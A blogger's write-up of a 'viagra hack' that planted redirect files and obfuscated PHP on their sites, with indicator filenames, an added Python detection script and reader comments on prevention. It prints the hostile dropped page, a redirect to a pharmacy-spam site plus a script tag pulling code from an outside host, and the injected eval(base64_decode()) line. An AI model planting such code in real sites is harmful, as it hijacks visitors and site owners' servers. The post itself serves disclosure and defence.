The “Comber 38” Viagra Hack


Just when I thought the Drunkjeans Hack had passed over, there’s another attack on a couple of my sites. I’ll call it the “Comber 38” hack. These hacks are most likely related.

What does this hack do?

With Comber 38, your sites are turned into Viagra Promo sites. Search for “viagra hack” and you’ll see how common this problem is.

Even though your home page may still work, the hackers use your site as a storage for images that can be pulled in from other sites, hence poncing off your server’s bandwidth.

If these files are linked to, your site redirects to some viagra site. It gives the hackers and spammers a direct link to a clean site rather than having to use their spam domains directly. If it weren’t so evil, you could argue it’s a pretty bright idea…

In fact, here’s what’s in one of those files:

<html>
<head>
<script>
location = 'http://cheapviagrarx.com/';
</script>
</head>
</html>
<script src=http://pkd.home.pl/regietow/button_krakow.php >
</script>

Apart from that, I’ve also discovered the following code at the top of my index.php file:

<?php eval(base64_decode('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')); ?>

I removed it – but after a few hours it was back as this:

<? php eval(base64_decode('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')); ?>

After a while Google will flag infected sites as “not safe” and StopBadware.org will pass this data on to Firefox, which in turn will block your site from being viewed.

Your hosting company may close down your site until you remove the threat.

What can we do about this, Cap’n?

At the moment, I assume that deleting the files will clear up the problem. Once that’s done, all we can hope for is that attacks will stay away until we can determine which security exploit (probably in Apache) has to be fixed. This is getting ridiculous!

If your site has been reported as “not safe”, you can help matters by requesting a review here and let StopBadware.org know that your site is no longer used for malicious activities.

Hack Variations

I’ve seen the following variations of these files. Please check your sites carefully if you see any of these or similar files (in which case, please leave a comment):

comber38.html / comber38.jpg
veld27.html/ veld27.jpg
spooky98.html / spooky98.jpg
hobnob59.thml / hobnob59.jpg
whoosh80.html / whoosh80.jpg
flight34.html / flight34.jpg
tiara30.html / tiara30.jpg
vista46.html / vista46.jpg
botch11.html / botch11.jpg
fetid47.html / fedif47.jpg
sullen50.html / sullen50.jpg
plea30.html / plea30.jpg
load38.html (interestingly without a .jpg variant)
craggy37.html / craggy 36.jpg
oxeye36.html
cradle60.html
sacred57.html
jacket78.html
orrery12.html
royal13.html
zigzag74.html
chance41.html
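As an added example (not code from the original post), here is a small Python scanner for the two indicators described above: the eval(base64_decode(...)) line injected at the very top of PHP files (with or without the space after “<?”), and dropped word-plus-two-digit .html/.jpg files carrying a JavaScript redirect. The redirect target, the base64 string and the JPEG-magic check on the .jpg files are constructed assumptions, not values from the post.

```python
import os
import re
import tempfile

# Indicator 1: PHP file that opens with an obfuscated eval(base64_decode(...)) call.
# Both "<?php eval(" and "<? php eval(" were seen, so allow whitespace after "<?".
PHP_INJECT = re.compile(rb"<\?\s*php\s+eval\s*\(\s*base64_decode\s*\(")
# Indicator 2: dropped files named <word><two digits>.html / .jpg (comber38, veld27, ...).
DROP_NAME = re.compile(r"^[a-z]+\d{2}\.(html|jpg)$")
JS_REDIRECT = re.compile(rb"location\s*=\s*['\"]https?://", re.IGNORECASE)

def scan_webroot(root):
    """Walk a web root and return sorted (relative_path, reason) pairs for suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                head = fh.read(4096)  # the injection sits at the top, so the head is enough
            if name.endswith(".php") and PHP_INJECT.search(head[:256]):
                findings.append((rel, "eval(base64_decode()) at top of PHP file"))
            if DROP_NAME.match(name):
                if name.endswith(".html") and JS_REDIRECT.search(head):
                    findings.append((rel, "dropped HTML file with JavaScript redirect"))
                elif name.endswith(".jpg") and not head.startswith(b"\xff\xd8"):
                    # Assumption: a real JPEG starts with FF D8; a dropped one holds HTML.
                    findings.append((rel, "dropped .jpg that is not a JPEG"))
    return sorted(findings)

def demo():
    """Build a constructed web root (one clean, three infected files) and scan it."""
    samples = {  # constructed sample content; the domain and base64 are placeholders
        "index.php": b"<? php eval(base64_decode('QUJDRA==')); ?>\n<?php echo 'home'; ?>",
        "about.php": b"<?php echo 'clean page'; ?>",
        "comber38.html": b"<html><head><script>\nlocation = 'http://example.invalid/';\n"
                         b"</script></head></html>",
        "comber38.jpg": b"<html><body>not really an image</body></html>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_webroot(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```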

Conclusion

These are troubling times, my friends! Please contribute below if your site has been compromised, and especially if you know how we can all prevent this from happening in the future.

Thanks 🙁


2 thoughts on “The “Comber 38” Viagra Hack”

  1. Damn, I just found my site fajar.biz being hacked by pharma sites. They forced me to reinstall it and I lost my previous settings. Can you tell me how to protect it? It's been hacked twice.

  2. Hi ashtray,

    I found that they got in via my FTP password. God only knows how they got that, but I traced this back – this is the only way in to change or upload files. My advice is to change your FTP password regularly and use something like Strong Password Generator to create a really long code nobody can hack. Change it every month for good measure.

    I also found that a host intrusion system is great for banning the IP address of hackers there and then after 10 hack attempts. I use OSSEC HIDS which seems to work wonders. I protect all my hosting clients like that now and haven’t had any problems since.
